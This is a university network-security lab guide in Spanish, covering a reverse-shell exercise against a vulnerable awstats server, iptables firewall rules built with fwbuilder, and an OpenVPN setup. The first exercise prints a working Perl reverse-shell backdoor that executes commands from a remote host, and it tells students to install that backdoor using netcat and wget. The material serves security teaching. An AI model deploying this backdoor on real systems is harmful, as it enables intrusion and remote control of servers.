Está en la página 1de 9

Fundamentos de la Seguridad Informática

Seguridad en Redes
Seguridad en Redes - página 2/9

1 Tabla de Contenidos
1 Propósito....................................................................................................................3
2 Convenciones.............................................................................................................4
3 Prácticas ....................................................................................................................4
3.1 Práctica 1 – Acceso a shell en forma reversa.......................................................4
3.1.1 Objetivos......................................................................................................4
3.1.2 Herramientas................................................................................................4
3.1.3 Presentación.................................................................................................4
3.1.4 Escenario......................................................................................................5
3.1.5 Guía de la práctica.......................................................................................5
3.2 Práctica 2 - Firewall.............................................................................................6
3.2.1 Objetivos......................................................................................................6
3.2.2 Herramientas................................................................................................6
3.2.3 Escenario......................................................................................................6
3.2.4 Presentación.................................................................................................6
3.2.5 Guía de la práctica.......................................................................................7
3.3 Práctica 3 – Virtual Private Network....................................................................8
3.3.1 Objetivos......................................................................................................8
3.3.2 Herramientas................................................................................................8
3.3.3 Escenario......................................................................................................8
3.3.4 Presentación.................................................................................................8
3.3.5 Guía de la práctica.......................................................................................8
4 Forma de Entrega.......................................................................................................9
5 Referencias.................................................................................................................9

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 3/9

1 Propósito
El propósito de las prácticas descritas en este documento es introducir a los
participantes en los problemas relacionados con la seguridad en redes.

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 4/9

2 Convenciones
dir_ip www.fing.edu.uy/inco/cursos/fsi/laboratorio/lab3

XX grupo de FSI asignado

<servidor> dirección del servidor, que será dada en la presentación


del curso.

<cliente> dirección del servidor, que será dada en la presentación


del curso.

3 Prácticas

3.1 Práctica 1 – Acceso a shell en forma reversa

3.1.1 Objetivos
Mostrar las posibles debilidades generadas cuando no se utiliza filtrado de paquetes
salientes en los firewalls

3.1.2 Herramientas
• netcat [Ncat06]
• perl [Perl06]
• Servidor web apache [Http06]

3.1.3 Presentación
Es común encontrar ataques remotos que generan acceso a una shell. En muchas
ocasiones el mecanismo utilizado es levantar un puerto en el equipo atacado donde
atiende una shell. El atacante tiene solamente que conectarse a ese puerto y lograr el
acceso.
Debido a la proliferación de firewalls, este tipo de ataques queda bastante limitado ya
que generalmente se filtran los accesos a puertos no estándares.
Un mecanismo de obtener una shell remota es que el equipo atacante sea el que
genere el pedido de conexión hacia afuera. Los firewalls por lo general admiten
accesos salientes a puertos estándares (21, 22, 25, 80, etc).
En este laboratorio veremos la obtención de una shell remota en donde el inicio de la
conexión es por parte del equipo atacado. De esa forma, podremos evadir los firewalls
ya que es la red interna atacada el que inicia la conexión a un puerto estándar del
equipo atacante.

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 5/9

3.1.4 Escenario
Máquina con netcat instalado
Máquina con servidor web apache instalado.

3.1.5 Guía de la práctica


Se dispone de una red con la siguiente topología:
Host: Servidor web.
Equipo atacante.
Además se sabe que las políticas de firewall permiten que el Servidor web pueda
establecer conexiones al puerto 8080 de cualquier equipo.
La práctica se basará en una vulnerabilidad del awstats
(www.securityfocus.org/bid/12543). La vulnerabilidad permite ejecutar comandos
remotos con los permisos del usuario que ejecuta el servidor web.
• Obtener una shell reversa. Esta tarea se realizará en dos etapas: la primera
consiste en generar un script perl en el equipo remoto que haga la conexión, y
la segunda consiste en ejecutar el script perl.
El exploit está disponible en http://www.securityfocus.com/bid/12543/exploit.
El script que genera una conexión a un equipo es el siguiente:

#!/usr/bin/perl
use Net::Telnet ();
use Net::Telnet;
($ip) = @ARGV;
print("$ip\n");
$telnet = new Net::Telnet ( Timeout=>30, Port=>8080);
$telnet->open($ip);
$count=1;
$telnet->print('Acceso desde equipo remoto');
$pattern='/\$ $/i';
while ($count == 1) {
$data = $telnet->get(Timeout=>100);
$output = `$data`;
$telnet->print($output);
}
exit 0

Tener muy presente que esta disponible en el sitio web del curso:
http://www.fing.edu.uy/inco/cursos/fsi/laboratorio/lab3/practica1/exploit.pl

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 6/9

Resultados esperados:
a) Instalación de un backdoor en el servidor web (el backdoor es el script que
permite establecer la conexión reversa). Explique detalladamente cuales fueron
los pasos para instalar el backdoor y el lugar de la instalación.
b) Explicación detallada de como se ejecuta el backdoor instalado en el servidor
web.
Sugerencias:
Averiguar que es una shell remota.
Utilizar el comando netcat (nc) en la ejecución del backdoor.
Puede ser de utilidad el comando wget para bajar cosas de un sitio web

3.2 Práctica 2 - Firewall

3.2.1 Objetivos
Afirmar los conocimientos sobre firewalls.

3.2.2 Herramientas
• Iptables [Ipta06]

3.2.3 Escenario
Equipo con sistema operativo linux que tiene instalados iptables y fwbuilder.

3.2.4 Presentación
Iptables se lo conoce como el firewall de linux y en esencia se puede definir como:
“un conjunto de comandos que permiten decirle al kernel qué hacer con ciertos
paquetes que cumplan con ciertas características”. El módulo del kernel asociado a
estos comandos es netfilter [Netf06].
Estos módulos están integrados al sistema operativo desde la versión 2.4. Iptables es
el sucesor de ipchains y sus principales características son:
• stateless packet filtering
• stateful packet filtering
• NAT
También se puede consultar el libro “Linux Firewalls Second Edition” [Zieg01].
Fwbuilder (firewall builder) es una herramienta de configuración y manejo de firewalls.
Está compuesto de una interfaz gráfica y un conjunto de compiladores de políticas.
Existen compiladores de políticas para varias plataformas, por ejemplo: iptables,
ipfilter, cisco PIX y mediante un sistema de plugins se pueden crear nuevos

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 7/9

compiladores.
Permite al administrador manejar un conjunto de firewalls de forma centralizada,
además, el lenguaje de alto nivel para escribir las reglas permite una mayor claridad
al momento de administrar las políticas de la empresa.

3.2.5 Guía de la práctica


Generación de reglas para iptables
El equipo tiene 3 tarjetas de red , cuyos números IP son:
192.168.32.X/24 (eth2 DMZ)
192.168.33.Y/24 (eth1 interna)
192.168.34.Z/24 (eth0 externa - insegura)

Dadas las siguientes redes


DMZ : 192.168.32.0/24
Interna : 192.168.33.0/24
Insegura : 192.168.34.0/24

Dado el host multisrv 192.168.32.2/24 con los siguientes servicios:


correo (smtp)
web
DNS

• Utilizando la herramienta fwbuilder configurar reglas para iptables de


forma que se cumpla la siguiente política de acceso:
(utilizar el comando sudo para ejecutar iptables)

a) Desde cualquiera de las redes se puede acceder al servidor


multisrv, al servicio de correo.
b) Desde cualquiera de las redes se puede acceder al servidor
multisrv, al servicio web.
c) Solamente se puede acceder al servidor DNS desde la red interna,
únicamente al servicio DNS.
d) Solamente se permite tráfico DNS desde el servidor DNS hacia la
red insegura.
e) Se permite tráfico ssh desde la red interna a cualquier lado.
f) Se permite tráfico http desde la red interna a cualquier lado.
g) El tráfico desde la red interna y la DMZ es enmascarado con la
dirección IP de la tarjeta externa.
h) Todo otro tráfico no es permitido
i) El tráfico descartado se debe registrar

Entregable:
En el directorio practica2:
– el archivo con la configuración generada por la herramienta (fw-
lab3.fwb)
– un archivo de texto con la lista de reglas de iptables generadas y una

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 8/9

breve explicación de las reglas que definen la política.

3.3 Práctica 3 – Virtual Private Network

3.3.1 Objetivos
• Este laboratorio tiene como objetivo experimentar en el armado y la
configuración de una VPN.

3.3.2 Herramientas
• OpenVPN (como ejemplo de VPN sobre SSL) [Opvp06]
• OpenSSL [Opss06]

3.3.3 Escenario
Equipo con sistema operativo linux y openvpn instalado.
Servidor linux con openvpn instalado y configurado.

3.3.4 Presentación
OpenVPN es una herramienta de código abierto que permite el armado de redes
privadas virtuales. Utiliza el protocolo SSL/TLS y soporta diferentes métodos de
autenticación, como certificados, clave compartida y smart cards.
En este laboratorio armaremos una VPN entre dos equipos, uno actuará como servidor
y el otro como cliente. Utilizaremos certificados para la autenticación del cliente y el
servidor. Para ello se necesitará generar un certificado para cada uno y el certificado
de una entidad certificadora (CA) que será utilizado para firmar los certificados del
cliente y el servidor. El cliente autenticará el certificado del servidor y el servidor el
certificado del cliente, verificando primero si el certificado fue firmado por la CA y
luego el contenido del certificado, como ser el common name o el tipo.

3.3.5 Guía de la práctica


● En el home del usuario de cada grupo, se encuentra el archivo
practica3.tar.gz, que contiene los certificados y las claves del cliente.
● Utilizando estos archivos configurar la herramienta OpenVPN para
establecer una VPN con el servidor <servidor>.
Entregable:
En el directorio practica3:
– El o los archivos modificados para configurar OpenVPN, con una
breve descripción de los cambios
– Un archivo de texto describiendo el procedimiento utilizado para
establecer la VPN y cómo se verificó que la misma se haya
establecido.

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República
Seguridad en Redes - página 9/9

4 Forma de Entrega
Se debe entregar el archivo entrega3.tar.gz conteniendo los tres
directorios creados en cada práctica y sus correspondientes archivos.
La página de entrega es: http://www.fing.edu.uy/inco/cursos/fsi/entrega.php

5 Referencias
[Ncat06] Networking utility, http://netcat.sourceforge.net/ (Noviembre 2006).
[Perl06] Lenguaje de programación interpretado, http://www.perl.com/
(Noviembre 2006)
[Http06] Open-source HTTP server, http://httpd.apache.org/ (Noviembre 2006)
[Ipta06] Netfilter, Iptables - Command line program to configure packet filtering
ruleset, http://www.netfilter.org/projects/iptables/index.html (Noviembre
2006).
[Netf06] Netfilter, Packet filtering framework inside theLinux 2.4.x and 2.6.x kernel
series, http://www.netfilter.org/ (Noviembre 2006).
[Zieg01] Robet L. Ziegler, Carl B. Constantine, Linux Firewalls Second Edition,
Noviembre 2001.
[Opvp06] OpenVPN Solutions, SSL VPN solution , http://openvpn.net/ (Noviembre
2006)
[Opss06] OpenSSL, Secure Sockets Layer and Transport Layer Security,
http://www.openssl.org/, (Noviembre 2006)

Grupo de Seguridad Informática


Facultad de Ingeniería
Universidad de la República

También podría gustarte